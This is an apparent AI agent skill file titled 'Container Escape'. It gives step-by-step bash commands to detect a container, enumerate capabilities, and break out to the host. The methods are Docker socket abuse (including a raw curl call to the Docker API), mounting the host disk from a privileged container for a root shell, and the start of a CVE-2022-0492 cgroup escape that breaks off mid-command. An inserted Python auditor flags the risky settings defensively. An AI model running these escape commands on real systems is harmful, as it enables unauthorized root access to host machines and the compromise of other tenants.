container-escape
Install: claude install-skill sunilgentyala/OmniRed
# Container Escape
## Phase 1 — Enumerate Container Context
```bash
# Am I in a container?
cat /proc/1/cgroup | grep docker
ls /.dockerenv
# What privileges do I have?
cat /proc/self/status | grep Cap
capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}')
# Is Docker socket mounted?
ls -la /var/run/docker.sock
# Is the container privileged?
ip link add dummy0 type dummy 2>&1 | grep -v "Permission denied"
# → if no error, you likely have CAP_NET_ADMIN (privileged indicator)
```
## Attack 1 — Docker Socket Escape
If `/var/run/docker.sock` is mounted:
```bash
# Start a new privileged container with host filesystem mounted
docker -H unix:///var/run/docker.sock run -it --rm \
  --privileged --pid=host --net=host \
  -v /:/host ubuntu chroot /host
# OR via API directly (no docker CLI needed)
curl -s --unix-socket /var/run/docker.sock \
  -X POST "http://localhost/containers/create" \
  -H "Content-Type: application/json" \
  -d '{"Image":"ubuntu","Cmd":["/bin/bash"],"HostConfig":{"Binds":["/:/host"],"Privileged":true}}'
```
## Attack 2 — Privileged Container Breakout
```bash
# Mount host filesystem via device access
fdisk -l # find host disk (e.g., /dev/xvda1)
mkdir /mnt/host
mount /dev/xvda1 /mnt/host
chroot /mnt/host /bin/bash # shell as root on host
```
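The settings these techniques depend on (a mounted Docker socket, `--privileged`, host PID/network namespaces, a host-root bind, and the `CAP_SYS_ADMIN` / unconfined-seccomp precondition noted for the cgroup v1 technique) are all visible in `docker inspect` output, so they can be audited from the host. The following is an added example, not part of the original skill; the function names, finding labels and sample JSON are constructed for illustration.

```python
import json

# Constructed `docker inspect` output for three containers (not from a real host).
SAMPLE_INSPECT = json.dumps([
    {"Name": "/ci-runner",
     "Mounts": [{"Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock"}],
     "HostConfig": {"Privileged": False, "PidMode": "", "NetworkMode": "bridge",
                    "CapAdd": None, "SecurityOpt": None}},
    {"Name": "/legacy-agent",
     "Mounts": [{"Source": "/", "Destination": "/host"}],
     "HostConfig": {"Privileged": True, "PidMode": "host", "NetworkMode": "host",
                    "CapAdd": ["SYS_ADMIN"], "SecurityOpt": ["seccomp=unconfined"]}},
    {"Name": "/web",
     "Mounts": [{"Source": "/srv/web/static", "Destination": "/usr/share/nginx/html"}],
     "HostConfig": {"Privileged": False, "PidMode": "", "NetworkMode": "bridge",
                    "CapAdd": [], "SecurityOpt": ["no-new-privileges"]}},
])

def audit_container(c):
    """Return the escape-enabling settings found on one inspected container."""
    hc = c.get("HostConfig") or {}
    findings = []
    if hc.get("Privileged"):
        findings.append("privileged")
    if hc.get("PidMode") == "host":
        findings.append("host-pid")
    if hc.get("NetworkMode") == "host":
        findings.append("host-net")
    for m in c.get("Mounts") or []:          # covers both -v and --mount
        src = m.get("Source", "")
        if src == "/":
            findings.append("host-root-mount")
        elif src.endswith("/docker.sock"):
            findings.append("docker-socket-mount")
    # CapAdd may be null, and entries may or may not carry the CAP_ prefix.
    caps = {cap.upper().replace("CAP_", "") for cap in hc.get("CapAdd") or []}
    if caps & {"SYS_ADMIN", "ALL"}:
        findings.append("cap-sys-admin")
    for opt in hc.get("SecurityOpt") or []:  # older engines use "seccomp:unconfined"
        if opt.replace(":", "=") == "seccomp=unconfined":
            findings.append("seccomp-unconfined")
    return findings

def audit(inspect_json):
    """Map container name -> findings for every container in the dump."""
    return {c["Name"].lstrip("/"): audit_container(c) for c in json.loads(inspect_json)}

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_INSPECT).items():
        print(f"{name}: {', '.join(findings) or 'ok'}")
```

On a real host, feed it the output of `docker inspect $(docker ps -q)` in place of the sample.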
## Attack 3 — cgroup v1 Escape (CVE-2022-0492)
```bash
# Requires CAP_SYS_ADMIN or unconfined seccomp
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgr